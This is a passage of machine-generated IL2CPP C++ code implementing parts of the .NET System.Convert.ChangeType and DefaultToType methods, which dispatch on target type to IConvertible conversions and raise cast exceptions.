IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_69, L_70); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_72 = L_71; RuntimeObject * L_73 = Box(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var, &L_72); return L_73; } IL_012b: { RuntimeObject* L_74 = V_0; RuntimeObject* L_75 = ___provider2; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_76 = InterfaceFuncInvoker1< DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 , RuntimeObject* >::Invoke(14 /* System.DateTime System.IConvertible::ToDateTime(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_74, L_75); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_77 = L_76; RuntimeObject * L_78 = Box(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var, &L_77); return L_78; } IL_0138: { RuntimeObject* L_79 = V_0; RuntimeObject* L_80 = ___provider2; String_t* L_81 = InterfaceFuncInvoker1< String_t*, RuntimeObject* >::Invoke(15 /* System.String System.IConvertible::ToString(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_79, L_80); return L_81; } IL_0140: { RuntimeObject * L_82 = ___value0; return L_82; } IL_0142: { String_t* L_83 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral55D1BE151653A5C241220EC0C5204A685F6D0FBA, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_84 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_84, L_83, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_84, NULL, Convert_ChangeType_m249060C66D575F9C00BEE88FB15788CFED9AD492_RuntimeMethod_var); } IL_0152: { String_t* L_85 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral07BC1266D48DC029301AB121DA798327931365C6, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_86 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_86, L_85, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_86, NULL, Convert_ChangeType_m249060C66D575F9C00BEE88FB15788CFED9AD492_RuntimeMethod_var); } IL_0162: { String_t* L_87 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral40408F06D64C0A4EE51AF41707D5D544083B012D, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_88 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m9A85EF7FEFEC21DDD525A67E831D77278E5165B7(L_88, L_87, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_88, NULL, Convert_ChangeType_m249060C66D575F9C00BEE88FB15788CFED9AD492_RuntimeMethod_var); } } // System.Object System.Convert::DefaultToType(System.IConvertible,System.Type,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR RuntimeObject * Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3 (RuntimeObject* ___value0, Type_t * ___targetType1, RuntimeObject* ___provider2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3_MetadataUsageId); s_Il2CppMethodInitialized = true; } RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * V_0 = NULL; { Type_t * L_0 = ___targetType1; IL2CPP_RUNTIME_CLASS_INIT(Type_t_il2cpp_TypeInfo_var); bool L_1 = Type_op_Equality_m7040622C9E1037EFC73E1F0EDB1DD241282BE3D8(L_0, (Type_t *)NULL, /*hidden argument*/NULL); if (!L_1) { goto IL_0014; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_2 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_2, _stringLiteralFA6B188D3101E2A5E782C1F0AF6FAFCA10C8BA53, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_DefaultToType_m899D5F6B9FE3E8B878BC56172C6BFE788B6C1BE3_RuntimeMethod_var); } IL_0014: { Type_t * L_3 = ___targetType1; V_0 = ((RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)IsInstClass((RuntimeObject*)L_3, RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var)); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_4 = V_0; IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_5 = RuntimeType_op_Inequality_mA98A719712593FEE5DCCFDB47CCABDB58BEE1B0D(L_4, (RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F *)NULL, /*hidden argument*/NULL); if (!L_5) { goto IL_0242; } } { RuntimeObject* L_6 = ___value0; Type_t * L_7 = Object_GetType_m2E0B62414ECCAA3094B703790CE88CBB2F83EA60(L_6, /*hidden argument*/NULL); Type_t * L_8 = ___targetType1; IL2CPP_RUNTIME_CLASS_INIT(Type_t_il2cpp_TypeInfo_var); bool L_9 = Type_op_Equality_m7040622C9E1037EFC73E1F0EDB1DD241282BE3D8(L_7, L_8, /*hidden argument*/NULL); if (!L_9) { goto IL_0037; } } { RuntimeObject* L_10 = ___value0; return L_10; } IL_0037: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_11 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_12 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_13 = 3; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_14 = (L_12)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_13)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_15 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_11, L_14, /*hidden argument*/NULL); if (!L_15) { goto IL_0053; } } { RuntimeObject* L_16 = ___value0; RuntimeObject* L_17 = ___provider2; bool L_18 = InterfaceFuncInvoker1< bool, RuntimeObject* >::Invoke(1 /* System.Boolean System.IConvertible::ToBoolean(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_16, L_17); bool L_19 = L_18; RuntimeObject * L_20 = Box(Boolean_tB53F6830F670160873277339AA58F15CAED4399C_il2cpp_TypeInfo_var, &L_19); return L_20; } IL_0053: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_21 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_22 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_23 = 4; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_24 = (L_22)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_23)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_25 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_21, L_24, /*hidden argument*/NULL); if (!L_25) { goto IL_006f; } } { RuntimeObject* L_26 = ___value0; RuntimeObject* L_27 = ___provider2; Il2CppChar L_28 = InterfaceFuncInvoker1< Il2CppChar, RuntimeObject* >::Invoke(2 /* System.Char System.IConvertible::ToChar(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_26, L_27); Il2CppChar L_29 = L_28; RuntimeObject * L_30 = Box(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var, &L_29); return L_30; } IL_006f: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_31 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_32 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_33 = 5; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_34 = (L_32)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_33)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_35 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_31, L_34, /*hidden argument*/NULL); if (!L_35) { goto IL_008b; } } { RuntimeObject* L_36 = ___value0; RuntimeObject* L_37 = ___provider2; int8_t L_38 = InterfaceFuncInvoker1< int8_t, RuntimeObject* >::Invoke(3 /* System.SByte System.IConvertible::ToSByte(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_36, L_37); int8_t L_39 = L_38; RuntimeObject * L_40 = Box(SByte_t9070AEA2966184235653CB9B4D33B149CDA831DF_il2cpp_TypeInfo_var, &L_39); return L_40; } IL_008b: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_41 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_42 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_43 = 6; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_44 = (L_42)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_43)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_45 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_41, L_44, /*hidden argument*/NULL); if (!L_45) { goto IL_00a7; } } { RuntimeObject* L_46 = ___value0; RuntimeObject* L_47 = ___provider2; uint8_t L_48 = InterfaceFuncInvoker1< uint8_t, RuntimeObject* >::Invoke(4 /* System.Byte System.IConvertible::ToByte(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_46, L_47); uint8_t L_49 = L_48; RuntimeObject * L_50 = Box(Byte_tF87C579059BD4633E6840EBBBEEF899C6E33EF07_il2cpp_TypeInfo_var, &L_49); return L_50; } IL_00a7: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_51 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_52 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_53 = 7; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_54 = (L_52)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_53)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_55 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_51, L_54, /*hidden argument*/NULL); if (!L_55) { goto IL_00c3; } } { RuntimeObject* L_56 = ___value0; RuntimeObject* L_57 = ___provider2; int16_t L_58 = InterfaceFuncInvoker1< int16_t, RuntimeObject* >::Invoke(5 /* System.Int16 System.IConvertible::ToInt16(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_56, L_57); int16_t L_59 = L_58; RuntimeObject * L_60 = Box(Int16_t823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D_il2cpp_TypeInfo_var, &L_59); return L_60; } IL_00c3: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_61 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_62 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_63 = 8; RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_64 = (L_62)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_63)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_65 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_61, L_64, /*hidden argument*/NULL); if (!L_65) { goto IL_00df; } } { RuntimeObject* L_66 = ___value0; RuntimeObject* L_67 = ___provider2; uint16_t L_68 = InterfaceFuncInvoker1< uint16_t, RuntimeObject* >::Invoke(6 /* System.UInt16 System.IConvertible::ToUInt16(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_66, L_67); uint16_t L_69 = L_68; RuntimeObject * L_70 = Box(UInt16_tAE45CEF73BF720100519F6867F32145D075F928E_il2cpp_TypeInfo_var, &L_69); return L_70; } IL_00df: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_71 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_72 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_73 = ((int32_t)9); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_74 = (L_72)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_73)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_75 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_71, L_74, /*hidden argument*/NULL); if (!L_75) { goto IL_00fc; } } { RuntimeObject* L_76 = ___value0; RuntimeObject* L_77 = ___provider2; int32_t L_78 = InterfaceFuncInvoker1< int32_t, RuntimeObject* >::Invoke(7 /* System.Int32 System.IConvertible::ToInt32(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_76, L_77); int32_t L_79 = L_78; RuntimeObject * L_80 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_79); return L_80; } IL_00fc: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_81 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_82 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_83 = ((int32_t)10); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_84 = (L_82)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_83)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_85 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_81, L_84, /*hidden argument*/NULL); if (!L_85) { goto IL_0119; } } { RuntimeObject* L_86 = ___value0; RuntimeObject* L_87 = ___provider2; uint32_t L_88 = InterfaceFuncInvoker1< uint32_t, RuntimeObject* >::Invoke(8 /* System.UInt32 System.IConvertible::ToUInt32(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_86, L_87); uint32_t L_89 = L_88; RuntimeObject * L_90 = Box(UInt32_t4980FA09003AFAAB5A6E361BA2748EA9A005709B_il2cpp_TypeInfo_var, &L_89); return L_90; } IL_0119: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_91 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_92 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_93 = ((int32_t)11); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_94 = (L_92)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_93)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_95 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_91, L_94, /*hidden argument*/NULL); if (!L_95) { goto IL_0136; } } { RuntimeObject* L_96 = ___value0; RuntimeObject* L_97 = ___provider2; int64_t L_98 = InterfaceFuncInvoker1< int64_t, RuntimeObject* >::Invoke(9 /* System.Int64 System.IConvertible::ToInt64(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_96, L_97); int64_t L_99 = L_98; RuntimeObject * L_100 = Box(Int64_t7A386C2FF7B0280A0F516992401DDFCF0FF7B436_il2cpp_TypeInfo_var, &L_99); return L_100; } IL_0136: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_101 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_102 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_103 = ((int32_t)12); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_104 = (L_102)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_103)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_105 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_101, L_104, /*hidden argument*/NULL); if (!L_105) { goto IL_0153; } } { RuntimeObject* L_106 = ___value0; RuntimeObject* L_107 = ___provider2; uint64_t L_108 = InterfaceFuncInvoker1< uint64_t, RuntimeObject* >::Invoke(10 /* System.UInt64 System.IConvertible::ToUInt64(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_106, L_107); uint64_t L_109 = L_108; RuntimeObject * L_110 = Box(UInt64_tA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E_il2cpp_TypeInfo_var, &L_109); return L_110; } IL_0153: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_111 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_112 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_113 = ((int32_t)13); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_114 = (L_112)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_113)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_115 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_111, L_114, /*hidden argument*/NULL); if (!L_115) { goto IL_0170; } } { RuntimeObject* L_116 = ___value0; RuntimeObject* L_117 = ___provider2; float L_118 = InterfaceFuncInvoker1< float, RuntimeObject* >::Invoke(11 /* System.Single System.IConvertible::ToSingle(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_116, L_117); float L_119 = L_118; RuntimeObject * L_120 = Box(Single_tDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1_il2cpp_TypeInfo_var, &L_119); return L_120; } IL_0170: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_121 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_122 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_123 = ((int32_t)14); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_124 = (L_122)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_123)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_125 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_121, L_124, /*hidden argument*/NULL); if (!L_125) { goto IL_018d; } } { RuntimeObject* L_126 = ___value0; RuntimeObject* L_127 = ___provider2; double L_128 = InterfaceFuncInvoker1< double, RuntimeObject* >::Invoke(12 /* System.Double System.IConvertible::ToDouble(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_126, L_127); double L_129 = L_128; RuntimeObject * L_130 = Box(Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409_il2cpp_TypeInfo_var, &L_129); return L_130; } IL_018d: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_131 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_132 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_133 = ((int32_t)15); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_134 = (L_132)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_133)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_135 = RuntimeType_op_Equality_mB551059029FC92ABEFC75A240B80302BE8302CA4(L_131, L_134, /*hidden argument*/NULL); if (!L_135) { goto IL_01aa; } } { RuntimeObject* L_136 = ___value0; RuntimeObject* L_137 = ___provider2; Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_138 = InterfaceFuncInvoker1< Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 , RuntimeObject* >::Invoke(13 /* System.Decimal System.IConvertible::ToDecimal(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_136, L_137); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_139 = L_138; RuntimeObject * L_140 = Box(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var, &L_139); return L_140; } IL_01aa: { RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_141 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE* L_142 = ((Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_StaticFields*)il2cpp_codegen_static_fields_for(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var))->get_ConvertTypes_0(); int32_t L_143 = ((int32_t)16); RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * L_144 = (L_142)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_143)); IL2CPP_RUNTIME_CLASS_INIT(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_il2cpp_TypeInfo_var); bool L_145 = 